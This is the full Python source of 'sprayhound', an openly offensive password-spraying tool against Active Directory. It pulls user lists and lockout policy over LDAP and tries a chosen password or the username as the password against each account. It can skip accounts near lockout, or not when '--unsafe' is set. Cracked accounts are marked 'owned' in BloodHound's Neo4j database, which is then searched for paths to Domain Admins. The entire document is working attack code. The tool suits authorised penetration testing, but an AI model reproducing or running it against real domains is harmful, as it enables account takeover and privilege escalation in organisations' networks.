# Author:
#  Romain Bentz (pixis - @hackanddo)
# Website:
#  https://beta.hackndo.com

import os
from sprayhound.modules.logger import Logger
from sprayhound.modules.ldapconnection import LdapConnection
from sprayhound.modules.neo4jconnection import Neo4jConnection
from sprayhound.modules.credential import Credential
from sprayhound.utils.utils import *


class SprayHound:
    def __init__(self, users, password, lower, upper, threshold,
                 ldap_options,
                 neo4j_options,
                 logger_options=Logger.Options(),
                 unsafe=False,
                 force=False
                 ):
        self.log = Logger(logger_options)
        self.ldap = LdapConnection(ldap_options, self.log)
        self.neo4j_options = neo4j_options
        self.neo4j = None
        self.credentials = []
        self.users = users
        self.password = password
        self.lower = lower
        self.upper = upper
        self.threshold = threshold
        self.unsafe = unsafe
        self.force = force

    def run(self):
        if not self.ldap.domain:
            return ERROR_LDAP_NOT_FQDN_DOMAIN

        if not (self.ldap.username and self.ldap.password and self.ldap.host):
            if not self.users:
                return ERROR_NO_USER_NO_LDAP
            else:
                if not self.force:
                    self.log.warn("BEWARE ! You are going to test user/pass without providing a valid domain user")
                    self.log.warn("Without a valid domain user, tested account may be locked out as we're not able to determine password policy and bad password count")

                    answer = self.log.input("Continue anyway?", ["y", "n"], "n")
                    if answer == "n":
                        self.log.warn("Wise master. Bye.")
                        sys.exit(0)
                self.get_credentials(lower=self.lower, upper=self.upper)
        else:
            try:
                self.ldap.login()
                self.log.success("Login successful")
            except Exception as e:
                self.log.error("Failed login")
                raise

            try:
                self.ldap.get_password_policy()
                self.log.success("Successfully retrieved password policy (Threshold: {})".format(self.ldap.domain_threshold))
            except Exception as e:
                self.log.error("Failed getting password policy")
                raise

            try:
                self.get_ldap_credentials(lower=self.lower, upper=self.upper)
                self.log.success("Successfully retrieved {} users".format(len(self.credentials)))
            except Exception as e:
                self.log.error("Failed getting ldap credentials")
                raise

        try:
            return self.test_credentials()
        except:
            raise

    def get_credentials(self, lower=False, upper=False):
        self.credentials = [Credential(user) for user in self.users]
        for i in range(len(self.credentials)):
            if self.password:
                self.credentials[i].password = self.password
            elif lower:
                self.credentials[i].password = self.credentials[i].samaccountname.lower()
            elif upper:
                self.credentials[i].password = self.credentials[i].samaccountname.upper()
            else:
                self.credentials[i].password = self.credentials[i].samaccountname

    def get_ldap_credentials(self, lower=False, upper=False):
        if not self.users:
            ret = self.ldap.get_users(self)
            if ret != ERROR_SUCCESS:
                return ret
        else:
            ret = self.ldap.get_users(self, users=self.users, disabled=True)
            if ret != ERROR_SUCCESS:
                return ret

        for i in range(len(self.credentials)):
            if self.password:
                self.credentials[i].set_password(self.password)
            elif lower:
                self.credentials[i].set_password(self.credentials[i].samaccountname.lower())
            elif upper:
                self.credentials[i].set_password(self.credentials[i].samaccountname.upper())
            else:
                self.credentials[i].set_password(self.credentials[i].samaccountname)

        return ERROR_SUCCESS

    def test_credentials(self):
        owned = []

        testing_nb = len([c.is_tested(self.threshold, self.unsafe) for c in self.credentials if c.is_tested(self.threshold, self.unsafe)[0]])

        self.log.success(self.log.colorize("{} users will be tested".format(testing_nb), self.log.GREEN))
        self.log.success(self.log.colorize("{} users will not be tested".format(len(self.credentials) - testing_nb), self.log.YELLOW))
        if not self.force:
            answer = self.log.input("Continue?", ['y', 'n'], 'y')
            if answer != "y":
                self.log.warn("Ok, master. Bye.")
                return ERROR_SUCCESS

        for credential in self.credentials:
            ret = credential.is_valid(self.ldap, self.threshold, self.unsafe)
            if ret == ERROR_SUCCESS:
                self.log.success("[  {}  ] {}".format(self.log.colorize("VALID", self.log.GREEN), self.log.highlight("{} : {}").format(credential.samaccountname, credential.password)))
                owned.append(credential.samaccountname)
            elif ret == ERROR_LDAP_SERVICE_UNAVAILABLE:
                return ret
            elif ret == ERROR_THRESHOLD:
                self.log.debug("[ {} ] {} : {} BadPwdCount: {}, PwdPol: {}".format(self.log.colorize("SKIPPED", self.log.BLUE), credential.samaccountname, credential.password, credential.bad_password_count+1, credential.threshold))
            elif ret == ERROR_LDAP_CREDENTIALS:
                self.log.debug("[{}] {} : {} failed - BadPwdCount: {}, PwdPol: {}".format(self.log.colorize("NOT VALID", self.log.RED), credential.samaccountname, credential.password, credential.bad_password_count+1, credential.threshold))
            else:
                self.log.debug("{} : {} failed - BadPwdCount: {}, PwdPol: {} (Error {}: {})".format(credential.samaccountname, credential.password, credential.bad_password_count+1, credential.threshold, ret[0], ret[1]))


        answer = "n"
        if len(owned) > 1:
            self.log.success("{} user(s) have been owned !".format(len(owned)))
            if not self.force:
                answer = self.log.input("Do you want to set them as 'owned' in Bloodhound ?", ['y', 'n'], 'y')
        elif len(owned) > 0:
            self.log.success("{} user has been owned !".format(len(owned)))
            if not self.force:
                answer = self.log.input("Do you want to set it as 'owned' in Bloodhound ?", ['y', 'n'], 'y')
        if not self.force:
            if answer != "y":
                self.log.warn("Ok, master. Bye.")
                return ERROR_SUCCESS

        self.neo4j = Neo4jConnection(self.neo4j_options)

        for own in owned:
            ret = self.neo4j.set_as_owned(own, self.ldap.domain)
            if ret == ERROR_SUCCESS:
                msg = "Node {} owned!".format(own)
                if self.neo4j.bloodhound_analysis(own, self.ldap.domain) == ERROR_SUCCESS:
                    msg += " [{}PATH TO DA{}]".format('\033[91m', '\033[0m')
                self.log.success(msg)
            elif ret == ERROR_NEO4J_NON_EXISTENT_NODE:
                self.log.warn("Node {} does not exist".format(own))
            else:
                return ret

        return ERROR_SUCCESS


class CLI:
    def __init__(self):
        self.args = get_args()
        self.log_options = Logger.Options(verbosity=self.args.v, nocolor=self.args.nocolor)

        self.log = Logger(self.log_options)

        self.ldap_options = LdapConnection.Options(
            self.args.domain_controller,
            self.args.domain,
            self.args.ldap_user,
            self.args.ldap_pass,
            self.args.ldap_port,
            self.args.ldap_ssl,
            self.args.ldap_page_size
        )
        self.neo4j_options = Neo4jConnection.Options(
            self.args.neo4j_host,
            self.args.neo4j_user,
            self.args.neo4j_pass,
            self.args.neo4j_port,
            self.log
        )

        self.users = []
        if self.args.username:
            self.users = [self.args.username]
        elif self.args.userfile:
            if not os.path.isfile(self.args.userfile):
                sprayhound_exit(self.log, ERROR_USER_FILE_NOT_FOUND)
            with open(self.args.userfile, 'r') as f:
                self.users = [user.strip().lower() for user in f if user.strip() != ""]
        self.password = self.args.password
        self.lower = self.args.lower
        self.upper = self.args.upper
        self.threshold = self.args.threshold

    def run(self):
        try:
            return SprayHound(
                self.users, self.password, self.lower, self.upper, self.threshold,
                ldap_options=self.ldap_options,
                neo4j_options=self.neo4j_options,
                logger_options=self.log_options,
                unsafe=self.args.unsafe,
                force=self.args.force
            ).run()
        except Exception as e:
            self.log.error("An error occurred while executing SprayHound")
            if self.args.v == 2:
                raise
            else:
                return False


def run():
    CLI().run()



# Author:
#  Romain Bentz (pixis - @hackanddo)
# Website:
#  https://beta.hackndo.com

# Generic Errors
ERROR_SUCCESS                       = (0, "")
ERROR_MISSING_ARGUMENTS             = (1, "")
ERROR_USER_FILE_NOT_FOUND           = (2, "Users file does not exist")
ERROR_NO_USER_NO_LDAP               = (3, "Either provide ldap credentials or user(s)")
ERROR_THRESHOLD                     = (4, "Bad password count reached threshold")

# Neo4J Errors
ERROR_NEO4J_CREDENTIALS             = (100, "Neo4j credentials are not valid")
ERROR_NEO4J_SERVICE_UNAVAILABLE     = (101, "Neo4j is not available")
ERROR_NEO4J_NON_EXISTENT_NODE       = (102, "Node does not exist in database")
ERROR_NO_PATH                       = (103, "No admin path from this node")
ERROR_NEO4J_UNEXPECTED              = (199, "Unexpected error with Neo4J")

# Ldap Errors
ERROR_LDAP_CREDENTIALS              = (200, "Ldap credentials are not valid")
ERROR_LDAP_SERVICE_UNAVAILABLE      = (201, "Ldap is not available")
ERROR_LDAP_NO_CREDENTIALS           = (202, "No credentials provided")
ERROR_LDAP_NOT_FQDN_DOMAIN          = (203, "Invalid domain")
ERROR_LDAP_UNEXPECTED               = (299, "Unexpected error with Ldap")


ERROR_UNDEFINED                     = (-1, "Unknown error")


class RetCode:
    def __init__(self, error, exception=None):
        self.error_code = error[0]
        self.error_msg = error[1]
        self.error_exception = exception

    def success(self):
        return self.error_code == 0

    def __str__(self):
        return "{} : {}".format(self.error_code, self.error_msg)

    def __eq__(self, other):
        if isinstance(other, RetCode):
            return self.error_code == other.error_code
        elif isinstance(other, int):
            return self.error_code == other
        elif isinstance(other, tuple):
            return self.error_code == other[0]
        return NotImplemented

    def __ne__(self, other):
        x = self.__eq__(other)
        if x is not NotImplemented:
            return not x
        return NotImplemented

    def __hash__(self):
        return hash(tuple(sorted(self.__dict__.items())))


# Author:
#  Romain Bentz (pixis - @hackanddo)
# Website:
#  https://beta.hackndo.com

from sprayhound.utils.utils import *


class Credential:
    def __init__(self, samaccountname, password=None, bad_password_count=0, threshold=0, dn=None):
        self.dn = dn
        self.samaccountname = samaccountname
        self.password = password
        self.bad_password_count = bad_password_count
        self.threshold = threshold

    def set_password(self, password):
        self.password = password

    def is_tested(self, threshold=1, unsafe=False):
        to_be_tested = True
        if not unsafe:
            if self.threshold > 0 and self.threshold - self.bad_password_count <= threshold:
                to_be_tested = False
        return to_be_tested, self.bad_password_count

    def is_valid(self, ldap_connection, threshold=1, unsafe=False):
        if not unsafe:
            if self.threshold > 0 and self.threshold - self.bad_password_count <= threshold:
                return ERROR_THRESHOLD
        return ldap_connection.test_credentials(self.samaccountname, self.password)


# Author:
#  Romain Bentz (pixis - @hackanddo)
# Website:
#  https://beta.hackndo.com

import socket
import ldap
from ldap.controls import SimplePagedResultsControl

from sprayhound.modules.credential import Credential
from sprayhound.utils.defines import *


class LdapConnection:
    class Options:
        def __init__(self, host, domain, username, password, port=None, ssl=False, page_size=200):
            self.host = host
            self.domain = domain
            self.username = username
            self.password = password
            self.ssl = ssl
            self.scheme = "ldaps" if self.ssl else "ldap"
            self.page_size = page_size
            if port is None:
                self.port = 636 if self.ssl else 389
            else:
                self.port = port

    def __init__(self, options, log):
        self.host = options.host
        self.domain = options.domain
        self.username = options.username
        self.password = options.password
        self.ssl = options.ssl
        self.scheme = options.scheme
        self.port = options.port
        self.page_size = options.page_size
        self.log = log
        self.domain_dn = None
        self._conn = None
        self.domain_threshold = 0
        self.granular_threshold = {}  # keys are policy DNs
        self.get_domain_dn()

    def get_domain(self):
        host_fqdn = socket.getfqdn()
        if "." not in host_fqdn:
            return ERROR_LDAP_NOT_FQDN_DOMAIN
        self.domain = host_fqdn.split('.', 1)[1]

    def get_domain_dn(self):
        if not self.domain:
            try:
                self.get_domain()
            except Exception as e:
                self.log.error("Could not get domain name")
                raise
        if '.' not in self.domain:
            return ERROR_LDAP_NOT_FQDN_DOMAIN
        self.domain_dn = ','.join(['DC=' + part for part in self.domain.split('.')])

    def login(self):
        self._get_conn()
        if not self.username or not self.password or not self.domain:
            return ERROR_LDAP_NO_CREDENTIALS
        try:
            self.log.debug("Trying bind with {}@{} : {}".format(self.username, self.domain, self.password))
            self._conn.simple_bind_s('{}@{}'.format(self.username, self.domain), self.password)
            self.log.debug("LDAP authentication successful!")
            return ERROR_SUCCESS
        except ldap.SERVER_DOWN:
            self.log.error("Service unavailable on {}://{}:{}".format(self.scheme, self.host, self.port))
            raise
        except ldap.INVALID_CREDENTIALS:
            self.log.error("Invalid credentials {}/{}:{}".format(self.domain, self.username, self.password))
            print([self.username])
            raise

    def test_credentials(self, username, password):
        self.username = username
        self.password = password

        self._get_conn()
        try:
            self._conn.simple_bind_s('{}@{}'.format(self.username, self.domain), self.password)
            return ERROR_SUCCESS
        except ldap.SERVER_DOWN:
            self.log.error("Service unavailable on {}://{}:{}".format(self.scheme, self.host, self.port))
            raise
        except ldap.INVALID_CREDENTIALS:
            return ERROR_LDAP_CREDENTIALS
        except Exception as e:
            self.log.error("Unexpected error while trying {}:{}".format(username, password))
            raise

    def get_users(self, dispatcher, users=None, disabled=True):
        filters = ["(objectClass=User)"]
        if users:
            if len(users) == 1:
                filters.append("(samAccountName={})".format(users[0].lower()))
            else:
                filters.append("(|")
                filters.append("".join("(samAccountName={})".format(user.lower()) for user in users))
                filters.append(")")
        if not disabled:
            filters.append("(!(userAccountControl:1.2.840.113556.1.4.803:=2))")

        if len(filters) > 1:
            filters = '(&' + ''.join(filters) + ')'
        else:
            filters = filters[0]
        try:
            self.log.debug("Looking in {}".format(self.domain_dn))
            ldap_attributes = ['samAccountName', 'badPwdCount']
            self.log.debug("Users will be retrieved using paging")
            res = self.get_paged_users(filters, ldap_attributes)


            results = [
                Credential(
                    samaccountname=entry['sAMAccountName'][0].decode('utf-8'),
                    bad_password_count=0 if 'badPwdCount' not in entry else int(entry['badPwdCount'][0]),
                    threshold=self.domain_threshold if dn not in self.granular_threshold else self.granular_threshold[dn]
                ) for dn, entry in res if isinstance(entry, dict) and entry['sAMAccountName'][0].decode('utf-8')[-1] != '$'
            ]

            dispatcher.credentials = results
            return ERROR_SUCCESS
        except Exception as e:
            self.log.error("An error occurred while looking for users via LDAP")
            raise

    def get_paged_users(self, filters, attributes):
        pages = 0
        result = []

        page_control = SimplePagedResultsControl(True, size=self.page_size, cookie='')
        res = self._conn.search_ext(
            self.domain_dn,
            ldap.SCOPE_SUBTREE,
            filters,
            attributes,
            serverctrls=[page_control]
        )

        while True:
            pages += 1
            self.log.debug("Page {} done".format(pages))
            rtype, rdata, rmsgid, serverctrls = self._conn.result3(res)
            result.extend(rdata)
            controls = [ctrl for ctrl in serverctrls if ctrl.controlType == SimplePagedResultsControl.controlType]
            if not controls:
                self.log.error('The server ignores RFC 2696 control')
                break
            if not controls[0].cookie:
                break
            page_control.cookie = controls[0].cookie
            res = self._conn.search_ext(
                self.domain_dn,
                ldap.SCOPE_SUBTREE,
                filters,
                attributes,
                serverctrls=[page_control]
            )
        return result

    def get_password_policy(self):
        default_policy_container = self.domain_dn
        granular_policy_container = 'CN=Password Settings Container,CN=System,{}'.format(self.domain_dn)
        granular_policy_filter = '(objectClass=msDS-PasswordSettings)'
        granular_policy_attribs = ['msDS-LockoutThreshold', 'msDS-PSOAppliesTo']
        try:
            # Load domain-wide policy.
            results = self._conn.search_s(default_policy_container, ldap.SCOPE_BASE)
        except ldap.LDAPError as e:
            self.log.error("An LDAP error occurred while getting password policy")
            raise
        self.domain_threshold = int(results[0][1]['lockoutThreshold'][0])

        results = self._conn.search_s(granular_policy_container, ldap.SCOPE_ONELEVEL, granular_policy_filter, granular_policy_attribs)
        for policy in results:
            if len(policy[1]['msDS-PSOAppliesTo']) > 0:
                for dest in policy[1]['msDS-PSOAppliesTo']:
                    self.granular_threshold[dest.decode('utf-8')] = int(policy[1]['msDS-LockoutThreshold'][0])

        return ERROR_SUCCESS

    def _get_conn(self):
        if self._conn is not None:
            return ERROR_SUCCESS
        self._conn = ldap.initialize('{}://{}:{}'.format(self.scheme, self.host, self.port))
        self._conn.set_option(ldap.OPT_NETWORK_TIMEOUT, 3.0)
        self._conn.protocol_version = 3
        self._conn.set_option(ldap.OPT_REFERRALS, 0)
        return ERROR_SUCCESS




# Author:
#  Romain Bentz (pixis - @hackanddo)
# Website:
#  https://beta.hackndo.com

import sys
import argparse
import pkg_resources

from sprayhound.utils.defines import *

version = pkg_resources.require("sprayhound")[0].version


def get_args():
    examples = '''example:
    sprayhound -d adsec.local -p Winter202
    sprayhound -U userlist.txt -d adsec.local
    '''

    parser = argparse.ArgumentParser(
        prog="sprayhound",
        description='sprayhound v{} - Password spraying'.format(version),
        epilog=examples,
        formatter_class=argparse.RawTextHelpFormatter
    )

    group_credentials = parser.add_argument_group('credentials')
    group_credentials.add_argument('-u', '--username', action='store', help="Username")
    group_credentials.add_argument('-U', '--userfile', action='store', help="File containing username list")
    group_credentials_exclu = group_credentials.add_mutually_exclusive_group()
    group_credentials_exclu.add_argument('-p', '--password', action='store', help="Password")
    group_credentials_exclu.add_argument('--lower', action='store_true', help="User as pass with lowercase password")
    group_credentials_exclu.add_argument('--upper', action='store_true', help="User as pass with uppercase password")
    group_credentials.add_argument('-t', '--threshold', action='store', type=int, default=1, help="Number of password left allowed before locked out")

    group_ldap = parser.add_argument_group('ldap')
    group_ldap.add_argument('-dc', '--domain-controller', action='store', help='Domain controller')
    group_ldap.add_argument('-d', '--domain', action='store', help='Domain FQDN')
    group_ldap.add_argument('-lP', '--ldap-port', default='389', action='store', help='LDAP Port')
    group_ldap.add_argument('-lu', '--ldap-user', action='store', help='LDAP User')
    group_ldap.add_argument('-lp', '--ldap-pass', action='store', help='LDAP Password')
    group_ldap.add_argument('-lssl', '--ldap-ssl', action='store_true', help='LDAP over TLS (ldaps)')
    group_ldap.add_argument('-lpage', '--ldap-page-size', type=int, default=200, help='LDAP Paging size (Default: 200)')

    group_neo4j = parser.add_argument_group('neo4j')
    group_neo4j.add_argument('-nh', '--neo4j-host', default='127.0.0.1', action='store', help='Neo4J Host (Default: 127.0.0.1)')
    group_neo4j.add_argument('-nP', '--neo4j-port', default='7687', action='store', help='Neo4J Port (Default: 7687)')
    group_neo4j.add_argument('-nu', '--neo4j-user', default='neo4j', action='store', help='Neo4J user (Default: neo4j)')
    group_neo4j.add_argument('-np', '--neo4j-pass', default='neo4j', action='store', help='Neo4J password (Default: neo4j)')

    parser.add_argument('--unsafe', action='store_true', help='Enable login tries on almost locked out accounts')
    parser.add_argument('--force', action='store_true', help='Do not prompt for user confirmation')
    parser.add_argument('--nocolor', action='store_true', help='Do not use color for output')

    parser.add_argument('-v', action='count', default=0, help='Verbosity level (-v or -vv)')

    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(RetCode(ERROR_MISSING_ARGUMENTS).error_code)

    return parser.parse_args()


def sprayhound_exit(logger, error):
    logger.error(error[1])
    sys.exit(error[0])


def sprayhound_error(logger, error):
    logger.error(error[1])



# Author:
#  Romain Bentz (pixis - @hackanddo)
# Website:
#  https://beta.hackndo.com

try:
    from neo4j.v1 import GraphDatabase
except ImportError:
    from neo4j import GraphDatabase
from neo4j.exceptions import AuthError, ServiceUnavailable

from sprayhound.utils.defines import *


class Neo4jConnection:
    class Options:
        def __init__(self, host, user, password, port, log, edge_blacklist=None):
            self.user = user
            self.password = password
            self.host = host
            self.port = port
            self.log = log
            self.edge_blacklist = edge_blacklist if edge_blacklist is not None else []

    def __init__(self, options):
        self.user = options.user
        self.password = options.password
        self.log = options.log
        self.edge_blacklist = options.edge_blacklist
        self._uri = "bolt://{}:{}".format(options.host, options.port)
        try:
            self._get_driver()
        except Exception as e:
            self.log.error("Failed to connect to Neo4J database")
            raise

    def set_as_owned(self, username, domain):
        user = self._format_username(username, domain)
        query = "MATCH (u:User {{name:\"{}\"}}) SET u.owned=True RETURN u.name AS name".format(user)
        self.log.debug("Query : {}".format(query))
        result = self._run_query(query)
        if len(result) > 0:
            return ERROR_SUCCESS
        else:
            return ERROR_NEO4J_NON_EXISTENT_NODE

    def bloodhound_analysis(self, username, domain):

        edges = [
            "MemberOf",
            "HasSession",
            "AdminTo",
            "AllExtendedRights",
            "AddMember",
            "ForceChangePassword",
            "GenericAll",
            "GenericWrite",
            "Owns",
            "WriteDacl",
            "WriteOwner",
            "CanRDP",
            "ExecuteDCOM",
            "AllowedToDelegate",
            "ReadLAPSPassword",
            "Contains",
            "GpLink",
            "AddAllowedToAct",
            "AllowedToAct",
            "SQLAdmin"
        ]
        # Remove blacklisted edges
        without_edges = [e.lower() for e in self.edge_blacklist]
        effective_edges = [edge for edge in edges if edge.lower() not in without_edges]

        user = self._format_username(username, domain)
        value = None

        with self._driver.session() as session:
            with session.begin_transaction() as tx:
                query = """
                    MATCH (n:User {{name:\"{}\"}}),(m:Group),p=shortestPath((n)-[r:{}*1..]->(m))
                    WHERE m.objectsid ENDS WITH "-512" OR m.objectid ENDS WITH "-512" 
                    RETURN COUNT(p) AS pathNb
                    """.format(user, '|'.join(effective_edges))

                self.log.debug("Query : {}".format(query))
                value = tx.run(query).value()
        return ERROR_SUCCESS if value[0] > 0 else ERROR_NO_PATH

    def clean(self):
        if self._driver is not None:
            self._driver.close()
        return ERROR_SUCCESS

    def _run_query(self, query):
        value = None
        with self._driver.session() as session:
            with session.begin_transaction() as tx:
                res = tx.run(query)
                value = res.value()
        return value

    def _get_driver(self):
        try:
            self._driver = GraphDatabase.driver(self._uri, auth=(self.user, self.password))
            return ERROR_SUCCESS
        except AuthError as e:
            self.log.error("Neo4j invalid credentials {}:{}".format(self.user, self.password))
            raise
        except ServiceUnavailable as e:
            self.log.error("Neo4j database unavailable at {}".format(self._uri))
            raise
        except Exception as e:
            self.log.error("An unexpected error occurred while connecting to Neo4J database {} ({}:{})".format(self._uri, self.user, self.password))
            raise

    @staticmethod
    def _format_username(user, domain):
        return (user + "@" + domain).upper()


# Author:
#  Romain Bentz (pixis - @hackanddo)
# Website:
#  https://beta.hackndo.com [FR]
#  https://en.hackndo.com [EN]

import sys


class Logger:
        



    class Options:
        def __init__(self, verbosity=0, nocolor=False):
            self.verbosity = verbosity
            self.nocolor = nocolor

    def __init__(self, options=Options()):
        if options.nocolor:
            self.DEFAULT  = ""

            self.RED      = ""
            self.GREEN    = ""
            self.YELLOW   = ""
            self.BLUE     = ""
            self.WHITE    = ""
        else:
            self.DEFAULT  = "\033[0m"

            self.RED      = "\033[1;31m"
            self.GREEN    = "\033[1;32m"
            self.YELLOW   = "\033[1;33m"
            self.BLUE     = "\033[1;34m"
            self.WHITE    = "\033[1;37m"
        self._verbosity = options.verbosity

    def info(self, msg):
        if self._verbosity >= 1:
            msg = "\n    ".join(msg.split("\n"))
            print("{}[*]{} {}".format(self.BLUE, self.DEFAULT, msg))

    def debug(self, msg):
        if self._verbosity >= 2:
            msg = "\n    ".join(msg.split("\n"))
            print("{}[*]{} {}".format(self.WHITE, self.DEFAULT, msg))

    def warn(self, msg):
        if self._verbosity >= 0:
            msg = "\n    ".join(msg.split("\n"))
            print("{}[!]{} {}".format(self.YELLOW, self.DEFAULT, msg))

    def error(self, msg):
        msg = "\n    ".join(msg.split("\n"))
        print("{}[X]{} {}".format(self.RED, self.DEFAULT, msg), file=sys.stderr)

    def success(self, msg):
        msg = "\n    ".join(msg.split("\n"))
        print("{}[+]{} {}".format(self.GREEN, self.DEFAULT, msg))

    def raw(self, msg):
        print("{}".format(msg), end='')

    def input(self, question, answers, default=False):
        if default and default not in answers:
            raise Exception("Default answer not valid")

        answer = False
        while not answer or answer not in answers:
            answer = input("    {} [{}] ".format(question, "/".join(answer.upper() if answer == default else answer for answer in answers)))
            if not answer and default:
                answer = default
        return answer.lower()

    def highlight(self, msg):
        return "{}{}{}".format(self.YELLOW, msg, self.DEFAULT)

    def colorize(self, msg, color):
        return "{}{}{}".format(color, msg, self.DEFAULT)

